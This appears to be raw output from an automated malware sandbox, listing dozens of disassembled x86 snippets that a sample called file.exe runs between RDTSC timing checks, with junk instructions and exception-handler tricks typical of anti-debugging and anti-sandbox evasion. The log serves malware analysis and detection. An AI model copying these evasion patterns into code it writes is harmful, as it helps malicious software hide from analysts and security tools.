Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F44D4 second address: 10F456F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF248D534A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 mov edi, eax 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007FF248D53498h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 0000001Ch 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b push eax 0x0000003c sbb bx, DF99h 0x00000041 pop edi 0x00000042 mov eax, dword ptr [ebp+122D15B1h] 0x00000048 mov edi, 6822F8F6h 0x0000004d push FFFFFFFFh 0x0000004f push 00000000h 0x00000051 push edx 0x00000052 call 00007FF248D53498h 0x00000057 pop edx 0x00000058 mov dword ptr [esp+04h], edx 0x0000005c add dword ptr [esp+04h], 0000001Ah 0x00000064 inc edx 0x00000065 push edx 0x00000066 ret 0x00000067 pop edx 0x00000068 ret 0x00000069 add bh, 0000002Dh 0x0000006c push eax 0x0000006d jno 00007FF248D534B1h 0x00000073 push eax 0x00000074 push edx 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F3456 second address: 10F345A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F456F second address: 10F4573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F64C4 second address: 10F64CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F345A second address: 10F34C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 or dword ptr [ebp+12448924h], ebx 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007FF248D53498h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 mov edi, 68ACF4D2h 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c mov eax, dword ptr [ebp+122D096Dh] 0x00000042 and edi, dword ptr [ebp+122D39C2h] 0x00000048 push FFFFFFFFh 0x0000004a add ebx, dword ptr [ebp+122D39A2h] 0x00000050 mov edi, dword ptr [ebp+122D3C6Ah] 0x00000056 nop 0x00000057 push edx 0x00000058 jns 00007FF248D53498h 0x0000005e pop edx 0x0000005f push eax 0x00000060 jng 00007FF248D534B7h 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F73EF second address: 10F73F5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F83C9 second address: 10F83CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FA4A0 second address: 10FA4A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FA4A6 second address: 10FA4CE instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF248D534ADh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FA4CE second address: 10FA4DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF249520A2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FA4DC second address: 10FA4E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FA586 second address: 10FA58A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FA58A second address: 10FA590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FB5F2 second address: 10FB609 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF249520A2Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FB609 second address: 10FB60F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FB60F second address: 10FB613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FB613 second address: 10FB695 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007FF248D53498h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 push 00000000h 0x00000025 jnp 00007FF248D53496h 0x0000002b jmp 00007FF248D534A4h 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebx 0x00000035 call 00007FF248D53498h 0x0000003a pop ebx 0x0000003b mov dword ptr [esp+04h], ebx 0x0000003f add dword ptr [esp+04h], 0000001Dh 0x00000047 inc ebx 0x00000048 push ebx 0x00000049 ret 0x0000004a pop ebx 0x0000004b ret 0x0000004c sub dword ptr [ebp+122D1CC0h], ebx 0x00000052 xchg eax, esi 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007FF248D5349Ah 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1102D64 second address: 1102D6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1109BB8 second address: 1109BBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111023A second address: 111023F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111023F second address: 1110287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007FF248D534A4h 0x00000010 mov eax, dword ptr [eax] 0x00000012 jng 00007FF248D534A2h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c pushad 0x0000001d jl 00007FF248D5349Ch 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11104BC second address: 11104D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007FF249520A28h 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007FF249520A2Ch 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11104D9 second address: 11104F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF248D5349Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11104F3 second address: 11104F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11104F8 second address: 1110502 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FF248D53496h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1110502 second address: 111052E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF249520A2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push ebx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 pushad 0x0000001a jp 00007FF249520A2Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1119476 second address: 11194A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 jl 00007FF248D534CFh 0x0000000c jmp 00007FF248D534A7h 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007FF248D53496h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111960A second address: 111961F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF249520A2Fh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111961F second address: 1119623 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1119623 second address: 1119630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1119A26 second address: 1119A3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF248D534A4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1119A3E second address: 1119A4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF249520A2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111A020 second address: 111A024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111A024 second address: 111A029 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111EC94 second address: 111ECA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF248D5349Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111EE44 second address: 111EE4E instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF249520A26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111F34B second address: 111F35A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jng 00007FF248D53496h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111F7A2 second address: 111F7A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111F7A6 second address: 111F7AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111F7AA second address: 111F7B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111F7B7 second address: 111F7BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111FA6F second address: 111FA8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF249520A38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111FA8E second address: 111FAAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF248D5349Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jl 00007FF248D53496h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111FBEA second address: 111FBFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FF249520A26h 0x0000000a popad 0x0000000b jng 00007FF249520A28h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111FBFD second address: 111FC0A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111FC0A second address: 111FC3B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FF249520A36h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jnp 00007FF249520A26h 0x00000016 popad 0x00000017 pushad 0x00000018 jg 00007FF249520A26h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112002B second address: 1120044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF248D534A4h 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1120044 second address: 1120058 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF249520A2Fh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EFC38 second address: 10EFC3D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F0407 second address: 10F040B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F040B second address: 10F040F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F040F second address: 10F0429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF249520A30h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F0E87 second address: 10F0EA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 jbe 00007FF248D534ADh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF248D5349Bh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F0EA1 second address: 10F0EBD instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF249520A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF249520A2Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F0EBD second address: 10F0EC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FF248D53496h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F0FBD second address: 10F0FEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF249520A36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FF249520A2Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F0FEC second address: 10F0FF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1123CDF second address: 1123D01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF249520A38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1123EA3 second address: 1123EBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FF248D534A4h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11260B9 second address: 11260BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11260BD second address: 11260D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push edi 0x00000008 pushad 0x00000009 js 00007FF248D53496h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112CCF9 second address: 112CD17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF249520A26h 0x0000000a popad 0x0000000b jmp 00007FF249520A33h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112CD17 second address: 112CD22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FF248D53496h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112D6CE second address: 112D6D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112D6D9 second address: 112D6DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112D83B second address: 112D83F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112D83F second address: 112D848 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112DB5A second address: 112DB63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112DB63 second address: 112DB69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112DB69 second address: 112DB6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112DB6D second address: 112DB83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF248D5349Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112DB83 second address: 112DB89 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AC052 second address: 10AC056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AC056 second address: 10AC075 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF249520A35h 0x00000007 jns 00007FF249520A26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AC075 second address: 10AC07A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AC07A second address: 10AC085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11348B8 second address: 11348BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11348BC second address: 11348CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FF249520A26h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11348CC second address: 11348E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF248D534A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11348E0 second address: 11348F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF249520A2Ah 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11348F0 second address: 11348F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1134572 second address: 1134579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1136C1C second address: 1136C21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1136C21 second address: 1136C31 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF249520A28h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1136917 second address: 1136921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113B349 second address: 113B358 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF249520A2Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113A61E second address: 113A644 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007FF248D53496h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF248D534A8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113A644 second address: 113A64A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113A64A second address: 113A650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113A650 second address: 113A65C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jbe 00007FF249520A26h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113A65C second address: 113A660 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113A660 second address: 113A666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113A974 second address: 113A978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
